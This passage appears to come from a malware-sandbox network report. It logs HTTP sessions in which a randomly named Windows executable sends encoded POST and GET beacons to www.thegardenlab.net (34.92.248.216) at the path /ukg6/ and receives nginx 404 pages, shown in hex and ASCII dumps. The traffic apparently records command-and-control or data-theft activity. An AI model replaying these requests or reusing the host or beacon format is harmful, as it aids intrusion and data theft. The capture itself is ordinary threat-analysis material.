                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 4f 2f 59 73 36 48 2f 65 31 73 79 70 41 30 30 30 37 6a 4d 4c 7a 6a 57 6a 35 42 64 58 39 38 31 61 61 56 45 36 4d 38 62 64 75 38 70 7a 77 75 41 51 50 39 50 48 65 56 6a 72 50 79 34 6c 71 72 69 4c 55 53 31 7a 30 47 7a 61 55 2b 52 65 6d 2b 6c 76 50 79 43 66 65 57 68 55 39 4d 6b 32 65 34 4e 50 68 73 4f 57 79 48 33 4b 7a 2b 73 74 6f 54 39 73 42 6e 30 4e 35 65 43 33 6c 55 68 4e 7a 6c 4d 6e 69 39 67 58 4e 74 2f 6e 51 44 46 5a 34 36 44 54 4c 55 48 58 6e 30 35 38 50 6e 34 46 4d 48 70 78 78 58 63 36 30 64 2b 30 64 50 50 57 78 49 31 2f 7a 65 4e 61 6f 62 72 6e 71 67 6c 5a 65 4f 2b 70 4d 41 31 4d 66 71 7a 4e 62 66 61 4c 44 68 77 73 70 6c 31 68 63 70 38 3d
                                                                                                                    Data Ascii: InQ=O/Ys6H/e1sypA0007jMLzjWj5BdX981aaVE6M8bdu8pzwuAQP9PHeVjrPy4lqriLUS1z0GzaU+Rem+lvPyCfeWhU9Mk2e4NPhsOWyH3Kz+stoT9sBn0N5eC3lUhNzlMni9gXNt/nQDFZ46DTLUHXn058Pn4FMHpxxXc60d+0dPPWxI1/zeNaobrnqglZeO+pMA1MfqzNbfaLDhwspl1hcp8=
                                                                                                                    Nov 2, 2024 20:01:37.645612001 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 02 Nov 2024 19:01:37 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: W/"66a0c828-e3b0"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 61 65 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 74 fc d7 b2 ec 50 76 24 08 3e b3 bf 22 9b 63 fd 52 e8 24 b4 62 91 65 06 2d 22 a0 55 20 de a0 b5 08 68 60 6c fe 7d f6 cd 64 b2 c8 19 eb 63 76 8f 88 40 00 5b 2f 5f ee be ee bf fd 9f f9 94 6d f7 5c fc a5 de 86 fe 7f fd 1f ff f6 f7 1f ff f4 6f 75 91 e4 ff eb ff f8 a7 7f fa b7 a1 d8 92 bf 64 75 b2 ac c5 f6 ef ff bc 6f e5 5f 99 7f fe 0b fc bf df 1a 93 a1 f8 f7 7f 3e 9a e2 9c a7 65 fb e7 bf 64 d3 b8 15 23 b8 f4 6c f2 ad fe f7 bc 38 9a ac f8 eb df fe f8 bf ff d2 8c cd d6 24 fd 5f d7 2c e9 8b 7f 47 ff 05 f9 c7 ad b6 66 eb 8b ff 45 20 c4 5f cc 69 fb 8b 3c ed 63 fe 6f f0 df 5f fc d3 88 75 bb c1 db e0 b7 7f fa 1f 7f f9 7f ff f9 f1 4f 43 b2 54 cd f8 af 7f 41 fe e7 df fe 9c 93 3c 6f c6 ea 3f ff 4e a7 eb af 6b f3 fc ed a5 74 5a f2 62 f9 2b 78 e9 6f d7 fe 7f fe 7c fb d3 cd ff b8 53 5d 34 55 bd fd eb 5f 50 04 f9 bf fe f7 05 e9 94 df ff 4f 17 fc 53 09 fa f8 e7 f6 05 f8 14 31 ff 97 db fe cb 9f de 27 cd 58 2c ff f1 d9 bc 59 e7 3e b9 ff f5 2f 65 5f fc fd ba 7f fa f3 db 5f [TRUNCATED]
                                                                                                                    Data Ascii: ae90tPv$>"cR$be-"U h`l}dcv@[/_m\ouduo_>ed#l8$_,GfE _i<co_uOCTA<o?NktZb+xo|S]4U_POS1'X,Y>/e__f)@Hl70k?zmA+jK3To_6#-Y[['OoTe?__8}Nuom%/?_'haI?F?[_i\%fk+Xm??lkHM`bHB^d4no?v/Y.&oY,[9O_!x&kAw{"/8ezA-;7I?)x\\5^Acra-n_HCu6G<;=d0>$.MF(^n(3ii<vA`uWv)d&Eu/~9wq#=gm`y'^D{@?U,7!g9,,uvMt2C=H\kTI;OQ,5b1rI8R'_\r [TRUNCATED]
                                                                                                                    Nov 2, 2024 20:01:37.645632982 CET1236INData Raw: 31 e7 80 43 ef 12 87 d4 0b 57 59 df 77 0b c4 eb 82 d3 5c b9 a8 b2 a6 5a 2b cb 1f ee 70 f3 c9 af dc 9b 5b 8f 8e 45 90 dd 3e 88 af a5 5f 98 c4 ea 6b 53 ee 56 39 e4 fd 29 13 12 26 f7 d8 a9 1a e2 0b f2 61 f7 32 f1 f4 ed 9c 4a b2 a8 0d f4 e6 ac 14 f4
                                                                                                                    Data Ascii: 1CWYw\Z+p[E>_kSV9)&a2J56TAQLy<7`u3q~Jf_ww=5~;k?z<#+OnRgRmED*apNXO3E1R.4%l/Fj\$~vr
                                                                                                                    Nov 2, 2024 20:01:37.645646095 CET1236INData Raw: 64 17 eb 49 91 ec f7 0a ce 65 f9 b2 39 e5 92 66 d7 e0 ed 7a c9 ed b8 f6 a8 44 5f d5 49 ab af ee c3 32 83 50 7e 1c 71 6d 9a 24 71 5f 1d b2 8e 6f 8f d3 eb 75 d0 03 35 30 e6 50 2d 8d 8a c0 e5 78 f9 65 08 b3 47 bd ed 4c 97 a3 07 ca d8 db 77 1c 10 02
                                                                                                                    Data Ascii: dIe9fzD_I2P~qm$q_ou50P-xeGLwqB{)No`pm!G'<ED/}+5wgh|Eo"INX+}mm>A#}R6'VR,ze]BN>\9u8wF}Rl"O%n\]@J40
                                                                                                                    Nov 2, 2024 20:01:37.645657063 CET636INData Raw: 6d ea 28 8c f3 03 cf 54 2d e6 1e df 97 5b 7e a7 75 b4 bb b5 fd 8e 84 d0 96 02 ac cd 93 e7 d8 8d 77 2d df e5 fa e9 0d 43 64 13 26 20 ec 88 25 37 3f d9 e3 7b ab 2e e2 54 6f 4f de 69 c9 60 92 be da 6a 51 58 e2 82 6b b5 20 7f fd 42 b5 9d bd a6 9e 96
                                                                                                                    Data Ascii: m(T-[~uw-Cd& %7?{.ToOi`jQXk BGR6]O{<4qBf:|M |\W#[ajO@- \s3Gk6ArEb42HPa0u9wS06NB"9<'yW"`
                                                                                                                    Nov 2, 2024 20:01:37.802994967 CET1236INData Raw: f3 d5 12 3c c1 f4 e2 b7 bb 52 58 b7 91 79 a7 2d 72 fd 6b 7d f4 3b 08 43 35 7d e9 e7 49 2d e4 4f c3 8e 4e fa 2d 05 ec cc 2b a2 f8 04 91 c3 33 cd ff ec ac 2b ac b8 36 7c 29 cd 16 fd 0a 0a e7 e4 5b 4b 5b 2f dc 3b 55 81 fe c8 2d 9b eb 66 f8 1b 00 46
                                                                                                                    Data Ascii: <RXy-rk};C5}I-ON-+3+6|)[K[/;U-fFpT#6K/[7p?7zL!~K:"}xRZrut}V\^3U.t$P}=RE~S~6~I'/:4VBe{L*B"7';
                                                                                                                    Nov 2, 2024 20:01:37.803019047 CET1236INData Raw: bc e4 9b a9 de 5e f5 19 2a 1f f6 d9 ad 7e 13 7e 10 c2 a3 72 9b 89 6a 29 8e b5 7b 33 8e 99 aa be 9e ae 64 53 32 83 28 7d 59 2b fe 33 c7 7c 85 8a ec 19 cc 46 ed c3 30 b4 18 aa de c9 f9 e4 26 68 f2 e9 96 53 2c fb 0a c9 13 64 bd 03 41 04 c1 55 ad 74
                                                                                                                    Data Ascii: ^*~~rj){3dS2(}Y+3|F0&hS,dAUtAT_]Fyl_`JJ^;'W;mE~CdHiPG'L0=h\|@$AoB=V/&vf@{GA6)8Rl&d0,@CudxqlV
                                                                                                                    Nov 2, 2024 20:01:37.803030968 CET1236INData Raw: 03 64 d7 2f 17 3a c5 15 41 03 90 79 c4 1b df 68 0f 24 cc 1f ad 8a 8f 11 61 2a f9 86 84 05 ba c8 ac 4a b4 54 d5 70 4e ce d6 22 51 aa 85 d4 96 09 80 7a e7 1d 53 4f 94 2e 96 bc 86 77 04 92 d3 c8 a8 ed 9c 13 4f 1b ff c0 80 ea c3 f1 9e 85 34 51 a2 d3
                                                                                                                    Data Ascii: d/:Ayh$a*JTpN"QzSO.wO4QJuShF]|.B`rN8O}'fC&i9=_7){$T.x,@@pk]GM{e"gyEX G2-?>1:WLxUPiHVMD~6HU
                                                                                                                    Nov 2, 2024 20:01:37.803044081 CET1236INData Raw: 03 eb 87 16 2c f3 b6 9c 8a 59 0b 6d c3 82 23 af 09 70 42 0f 24 c4 96 d4 79 d2 5b 3e 06 a3 c8 41 33 60 7d ca 90 c9 30 92 66 36 15 d6 e5 06 08 70 50 5e 99 b8 e7 20 38 d9 88 41 c2 2e 69 54 5c 4c 50 c8 dc f5 7d 71 9c 88 ca 85 d7 e2 5f 21 5c 09 eb b6
                                                                                                                    Data Ascii: ,Ym#pB$y[>A3`}0f6pP^ 8A.iT\LP}q_!\ymMdOSQl#MF`U:e#pxh-mPw_0&_Dsi&'fy&!C!0!P?grsOmoh3 gfHUadG9a~`z
                                                                                                                    Nov 2, 2024 20:01:37.803055048 CET1236INData Raw: fd 85 17 0b 6c 0a b7 18 37 15 6b f0 83 f0 0c 5a d1 ee a6 5b 1f 39 5a 45 c2 bb 7b 5b 4c 63 c4 63 04 92 20 ab 0c 3f 40 2b 5f 4c f1 e4 08 59 cd 7a 8a 0d 3a 04 28 50 00 fa ea ae 24 07 99 7d 57 c9 41 f4 2c 12 17 78 a8 d3 f1 b6 1e d8 30 13 b1 5f 65 37
                                                                                                                    Data Ascii: l7kZ[9ZE{[Lcc ?@+_LYz:(P$}WA,x0_e70p`qVx# V}zCn>@JY|p,+,YMc'NMz=K&%FdL>?p%0&LA[cW&O2\mxVfy-$dkN
                                                                                                                    Nov 2, 2024 20:01:37.803073883 CET1236INData Raw: 79 b9 96 c6 ed ee 37 03 64 2d 6e 35 58 70 fb ab c9 1d ea a9 57 71 2e f9 9e 43 dd e6 4f 91 24 11 72 80 36 d1 f1 95 c8 9f 1a 60 74 17 25 9c 94 9f 42 76 df e8 8a 91 61 04 d6 81 9f 17 c0 59 fc 99 94 2c 22 53 99 e3 62 a5 01 bc 07 a0 7b fc ba 7c 1b 20
                                                                                                                    Data Ascii: y7d-n5XpWq.CO$r6`t%BvaY,"Sb{| m57W{@Dlf=#U/7JV2;{QJYpc|\}DVSiR-Fo=G;#1^y~a~(:9qcRo|h^pHb|muO'[?/e@
                                                                                                                    Nov 2, 2024 20:01:37.803673029 CET1236INData Raw: 63 b5 58 e8 70 70 58 07 a9 ac 1c 1d 30 d9 88 95 00 bc 35 20 67 8b 1e d6 f0 e1 5d 19 24 fe ee ec 5b 41 7e 5e a8 d4 ab a7 de 25 a5 6e 55 c1 b3 b7 fc 56 45 e8 35 21 38 9a d2 65 f7 06 f3 40 f1 9f 44 62 3c 9a a9 d8 80 8f bf 8f f8 1b 69 fd 48 66 66 37
                                                                                                                    Data Ascii: cXppX05 g]$[A~^%nUVE5!8e@Db<iHff73zMAIai7z\}QdzT^M{}=w &lSC_K({gRGCjbk?d#VRt@5y6IUF`f&S1?KWF7DvREN61;


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    43192.168.2.45004534.92.248.216803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:39.402565002 CET10909OUTPOST /ukg6/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.thegardenlab.net
                                                                                                                    Origin: http://www.thegardenlab.net
                                                                                                                    Referer: http://www.thegardenlab.net/ukg6/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 4f 2f 59 73 36 48 2f 65 31 73 79 70 41 30 30 30 37 6a 4d 4c 7a 6a 57 6a 35 42 64 58 39 38 31 61 61 56 45 36 4d 38 62 64 75 38 68 7a 77 59 55 51 50 65 58 48 66 56 6a 72 4d 79 34 6b 71 72 69 4b 55 53 38 36 30 47 2b 6c 55 38 5a 65 30 4e 74 76 4b 44 43 66 55 57 68 55 6c 38 6b 33 44 6f 4e 57 68 6f 71 53 79 48 6e 4b 7a 2b 73 74 6f 53 74 73 49 53 49 4e 37 65 43 30 79 6b 67 43 2b 46 4d 4c 69 39 34 48 4e 74 37 33 52 7a 6c 5a 35 61 54 54 4a 42 54 58 34 45 35 79 4f 6e 34 64 4d 48 74 75 78 58 51 51 30 5a 32 53 64 4e 54 57 79 75 59 32 33 4d 78 36 79 71 6a 38 70 52 52 62 66 2b 4f 37 44 7a 34 79 65 49 62 4f 4e 62 71 6a 42 32 6c 48 7a 30 64 33 66 50 46 44 6f 72 69 63 46 30 38 48 53 73 6e 62 75 4a 56 78 45 37 55 67 6d 46 30 74 6d 49 6f 76 37 67 32 53 66 4b 4e 63 79 50 6a 32 59 51 51 68 76 51 6a 4d 41 70 73 6f 30 37 59 4f 33 44 73 48 6b 43 7a 56 6b 56 67 4a 54 2b 68 57 2b 30 34 61 69 6b 50 73 67 4d 4a 49 34 76 6a 70 61 5a 36 38 4b 64 35 72 6c 66 6a 50 63 45 55 48 66 33 62 41 45 50 47 35 54 42 4a 47 46 6e [TRUNCATED]
                                                                                                                    Data Ascii: InQ=O/Ys6H/e1sypA0007jMLzjWj5BdX981aaVE6M8bdu8hzwYUQPeXHfVjrMy4kqriKUS860G+lU8Ze0NtvKDCfUWhUl8k3DoNWhoqSyHnKz+stoStsISIN7eC0ykgC+FMLi94HNt73RzlZ5aTTJBTX4E5yOn4dMHtuxXQQ0Z2SdNTWyuY23Mx6yqj8pRRbf+O7Dz4yeIbONbqjB2lHz0d3fPFDoricF08HSsnbuJVxE7UgmF0tmIov7g2SfKNcyPj2YQQhvQjMApso07YO3DsHkCzVkVgJT+hW+04aikPsgMJI4vjpaZ68Kd5rlfjPcEUHf3bAEPG5TBJGFn/aXkZneDNQ7p/fUoKCi+oZWV4aKxFlLjT1A5yS7hUZ0Rrcl61J5xEH/QoFWbaw1M4J/uDxrtCVQXykAnT/uUziOvfrGcnsFpPyH7C01w2aeiyyeH198ZvWpJDj4Frkc+YfikXKopPsc4SRXqcnF+x3EhtT8278KRkEGJzasHBMRjVUG+9KzuDnSmFZkSMEPk8xaNlYYzS9Mwf3iFFpuY1I5IQf0i6wd40lO5c3bOJgw9EhmZ0pZjwzkQRBNmGMwwqmRsGQRuFoETgcGd28+OQBciAWwbep9DcxF+GW05vUB3TDC7zblhWgol4d+p6kWcHbZ+8b421dkCh14H0dX6Qd/5e/sTdXcujFBtiktuqQZmSBnsIQTOonyaaYe/NBf1eq0nxT3BIVIvorvFQagWhLLs0aRtYJiWD4FF7j7txZP3/n2KDcdGRUMAfvl34mVVNABYFl5LaP9i2maD5fbYZcXAuMHqxyhzI6HDmy64IPtmoGRvaGpdvqs/ohqSYAkJIUQHMReNeXaxHHHcDMt8CPWANbYLFH/Jp75K3DWfoinbL+4pdu3HKvW1YsMVxQEzaPzSbGy9Kazy0cFMqoH9vKi0nGqxlPybJROUVDLviDyIfSbD6KKe3gpV+XLq0KWBW/XTvIMbScpom3T99/pZTFjZOAJYPfQUch [TRUNCATED]
                                                                                                                    Nov 2, 2024 20:01:40.286863089 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 02 Nov 2024 19:01:40 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: W/"66a0c828-e3b0"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 61 65 39 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 74 fc d7 b2 ec 50 76 24 08 3e b3 bf 22 9b 63 fd 52 e8 24 b4 62 91 65 06 2d 22 a0 55 20 de a0 b5 08 68 60 6c fe 7d f6 cd 64 b2 c8 19 eb 63 76 8f 88 40 00 5b 2f 5f ee be ee bf fd 9f f9 94 6d f7 5c fc a5 de 86 fe 7f fd 1f ff f6 f7 1f ff f4 6f 75 91 e4 ff eb ff f8 a7 7f fa b7 a1 d8 92 bf 64 75 b2 ac c5 f6 ef ff bc 6f e5 5f 99 7f fe 0b fc bf df 1a 93 a1 f8 f7 7f 3e 9a e2 9c a7 65 fb e7 bf 64 d3 b8 15 23 b8 f4 6c f2 ad fe f7 bc 38 9a ac f8 eb df fe f8 bf ff d2 8c cd d6 24 fd 5f d7 2c e9 8b 7f 47 ff 05 f9 c7 ad b6 66 eb 8b ff 45 20 c4 5f cc 69 fb 8b 3c ed 63 fe 6f f0 df 5f fc d3 88 75 bb c1 db e0 b7 7f fa 1f 7f f9 7f ff f9 f1 4f 43 b2 54 cd f8 af 7f 41 fe e7 df fe 9c 93 3c 6f c6 ea 3f ff 4e a7 eb af 6b f3 fc ed a5 74 5a f2 62 f9 2b 78 e9 6f d7 fe 7f fe 7c fb d3 cd ff b8 53 5d 34 55 bd fd eb 5f 50 04 f9 bf fe f7 05 e9 94 df ff 4f 17 fc 53 09 fa f8 e7 f6 05 f8 14 31 ff 97 db fe cb 9f de 27 cd 58 2c ff f1 d9 bc 59 e7 3e b9 ff f5 2f 65 5f fc fd ba 7f fa f3 db 5f [TRUNCATED]
                                                                                                                    Data Ascii: ae90tPv$>"cR$be-"U h`l}dcv@[/_m\ouduo_>ed#l8$_,GfE _i<co_uOCTA<o?NktZb+xo|S]4U_POS1'X,Y>/e__f)@Hl70k?zmA+jK3To_6#-Y[['OoTe?__8}Nuom%/?_'haI?F?[_i\%fk+Xm??lkHM`bHB^d4no?v/Y.&oY,[9O_!x&kAw{"/8ezA-;7I?)x\\5^Acra-n_HCu6G<;=d0>$.MF(^n(3ii<vA`uWv)d&Eu/~9wq#=gm`y'^D{@?U,7!g9,,uvMt2C=H\kTI;OQ,5b1rI8R'_\r [TRUNCATED]
                                                                                                                    Nov 2, 2024 20:01:40.286943913 CET212INData Raw: 31 e7 80 43 ef 12 87 d4 0b 57 59 df 77 0b c4 eb 82 d3 5c b9 a8 b2 a6 5a 2b cb 1f ee 70 f3 c9 af dc 9b 5b 8f 8e 45 90 dd 3e 88 af a5 5f 98 c4 ea 6b 53 ee 56 39 e4 fd 29 13 12 26 f7 d8 a9 1a e2 0b f2 61 f7 32 f1 f4 ed 9c 4a b2 a8 0d f4 e6 ac 14 f4
                                                                                                                    Data Ascii: 1CWYw\Z+p[E>_kSV9)&a2J56TAQLy<7`u3q~Jf_ww=5~;k?z<#+OnRgRmED*apNXO3E
                                                                                                                    Nov 2, 2024 20:01:40.286956072 CET1236INData Raw: 31 d1 a4 52 2e 34 10 fd 01 8f b6 ef 25 6c 2f 46 1c 17 6a 5c 0b 24 b0 fc ce 7e 76 f3 8a 14 72 40 e0 9e f4 1d 81 89 eb d7 f6 26 6f 08 0e ac 5c 81 ba 39 80 ae ac fb b5 3e 22 1e 57 99 bc c5 e9 28 e2 9b 90 45 51 13 bf 2d a5 2c fe e3 64 35 02 ad 5d ed
                                                                                                                    Data Ascii: 1R.4%l/Fj\$~vr@&o\9>"W(EQ-,d5]?1Z\Z>os!<,bh\%Qt(w(Ya/"R:y<S$K\1~A[A{Lz.aX`^'xc&ehr_jc&|Bdp_J`&PB
                                                                                                                    Nov 2, 2024 20:01:40.287024021 CET1236INData Raw: 7d 83 52 19 cf f4 6c 05 84 f6 22 8d 4f fd 25 98 6e 5c 5d ee 40 fc 4a fb f2 08 f6 8f c4 34 30 c7 07 2a f3 a3 05 10 8e a4 db e8 9d bd 32 7d 7c 69 2e 5a 77 98 ed a7 9f 7e 55 6e 0d 32 64 0e 04 3e c5 c6 53 d4 59 db f4 57 8c 73 e8 98 6f 53 1a 47 a4 db
                                                                                                                    Data Ascii: }Rl"O%n\]@J40*2}|i.Zw~Un2d>SYWsoSG+7i|,an;LKgP8!%&?*F~C{.|W4K:%?6ZqSB`;2~O{h0XC@E#EaR#FU6E:'I
                                                                                                                    Nov 2, 2024 20:01:40.287034988 CET1236INData Raw: 8a 30 75 fd 39 77 d1 53 30 36 ec b3 ce c5 0b 4e 42 1d 22 39 15 3c 09 9a 27 05 79 57 22 13 60 36 d2 6a 89 9e 72 20 e5 58 99 35 bc be e4 f2 74 cf 5c 5d fd 75 64 42 bc 7c a2 19 af b8 14 da 39 bb f1 15 1a 81 82 ac a1 03 84 94 2f 21 7a e6 5e b5 e9 04
                                                                                                                    Data Ascii: 0u9wS06NB"9<'yW"`6jr X5t\]udB|9/!z^%@X0wS7)n0Q`8@tz j(Jc1M}iO;5J`"sXNNi 5K&Df|JvPsoAL@B
                                                                                                                    Nov 2, 2024 20:01:40.287040949 CET476INData Raw: 99 80 71 f5 d7 b0 f5 e5 d6 e7 26 74 84 a9 7c 47 3f fc 4c a3 1f fa ba 68 ea b5 c9 70 5e f8 fe f9 fa 30 48 ae 4b 53 7a 96 9c 62 aa 90 4c df 2d 4f f8 d1 fa 79 6d 24 42 0f 81 05 9b d6 21 e6 30 4a 63 20 e3 54 78 65 c3 ef 87 60 52 19 21 08 48 de 82 57
                                                                                                                    Data Ascii: q&t|G?Lhp^0HKSzbL-Oym$B!0Jc Txe`R!HW.I0fX9E3]5+\_}}y1w81=gHo;s``&|3;ON-QZN6"]]`RKRen#8,dW*@7Rf[x]]E[k
                                                                                                                    Nov 2, 2024 20:01:40.287050962 CET1236INData Raw: ed c3 30 b4 18 aa de c9 f9 e4 26 68 f2 e9 96 53 2c fb 0a c9 13 64 bd 03 41 04 c1 55 ad 74 41 54 5f 5d e5 88 11 e0 46 15 79 fd 6c d9 db b1 fd 5f 60 4a 4a 83 85 ee 9b 5e 1e e8 89 3b cb 27 f8 df a1 d2 07 0c 02 02 aa d3 57 ec ec 3b 9b 6d 45 7e 43 1b
                                                                                                                    Data Ascii: 0&hS,dAUtAT_]Fyl_`JJ^;'W;mE~CdHiPG'L0=h\|@$AoB=V/&vf@{GA6)8Rl&d0,@CudxqlVZKe#)K1YJe,Oukjlw~$^
                                                                                                                    Nov 2, 2024 20:01:40.287060976 CET1236INData Raw: 53 4f 94 2e 96 bc 86 77 04 92 d3 c8 a8 ed 9c 13 4f 1b ff c0 80 ea c3 f1 9e 85 34 51 a2 d3 10 1c 0d e7 97 bb 4a 75 53 c8 68 cf 46 1f ba 5d 7c 13 9b bc a0 2e ac 42 ca 60 d4 96 9d 72 4e 38 a9 97 ab 4f 7d 27 66 43 26 69 d5 39 d5 88 1b ee 3d 90 8e 5f
                                                                                                                    Data Ascii: SO.wO4QJuShF]|.B`rN8O}'fC&i9=_7){$T.x,@@pk]GM{e"gyEX G2-?>1:WLxUPiHVMD~6HU$7%xBO'N,7<9=5
                                                                                                                    Nov 2, 2024 20:01:40.287101030 CET1236INData Raw: e7 20 38 d9 88 41 c2 2e 69 54 5c 4c 50 c8 dc f5 7d 71 9c 88 ca 85 d7 e2 5f 21 5c 09 eb b6 de af fc 79 6d f6 f9 4d dd 64 b8 4f 53 d1 51 6c b6 23 4d a3 e4 a2 e0 9b 1f 89 0e 46 f9 a1 15 60 be a1 df a2 b0 55 3a 65 23 ef 70 78 db 68 ba 2d 6d 9b 93 50
                                                                                                                    Data Ascii: 8A.iT\LP}q_!\ymMdOSQl#MF`U:e#pxh-mPw_0&_Dsi&'fy&!C!0!P?grsOmoh3 gfHUadG9a~`zK!&gO;! t?&(
                                                                                                                    Nov 2, 2024 20:01:40.287113905 CET1236INData Raw: 28 50 00 fa ea ae 24 07 99 7d 57 c9 41 f4 2c 12 17 78 a8 d3 f1 b6 1e d8 30 13 b1 5f 65 37 30 05 70 0a 1f 8e 83 f7 60 f7 71 e7 bf ee 9b 56 a1 0f 78 d8 23 87 bf 91 d3 20 dc f4 56 b7 7d 7a 9f ef 89 43 6e 8e 3e 40 4a 81 97 de d1 59 fa 7c 70 c6 cd 7f
                                                                                                                    Data Ascii: (P$}WA,x0_e70p`qVx# V}zCn>@JY|p,+,YMc'NMz=K&%FdL>?p%0&LA[cW&O2\mxVfy-$dkNfb$=<(mP.-CKz1N21
                                                                                                                    Nov 2, 2024 20:01:40.291985035 CET1236INData Raw: 8a 91 61 04 d6 81 9f 17 c0 59 fc 99 94 2c 22 53 99 e3 62 a5 01 bc 07 a0 7b fc ba 7c 1b 20 6d f2 35 37 bf d7 57 a2 7b 40 bc ec 44 6c 66 3d ef 23 7f d8 bc 18 dc cc d0 e4 55 2f 18 88 37 4a b7 07 56 ee c7 81 85 1c 32 d5 bc 3b 1f c7 f2 a6 7b aa 1a 51
                                                                                                                    Data Ascii: aY,"Sb{| m57W{@Dlf=#U/7JV2;{QJYpc|\}DVSiR-Fo=G;#1^y~a~(:9qcRo|h^pHb|muO'[?/e@_Ucl"":demek9l4 @LA-CA


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    44192.168.2.45004634.92.248.216803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:01:41.940278053 CET534OUTGET /ukg6/?InQ=D9wM5xDL/q3TI2g2vD4UiiybpTRhluIicjQPF53/huNm+8guGd31VA7hAVYl0bGFbVNx83u8duJjtMB4AC+GThc54L4vcaEMqaTD3FORm4ZRpAFMFX0j2sk=&4b0dM=fDYPF HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.thegardenlab.net
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 20:01:42.919622898 CET1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 02 Nov 2024 19:01:42 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 58288
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    ETag: "66a0c828-e3b0"
                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                                    Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
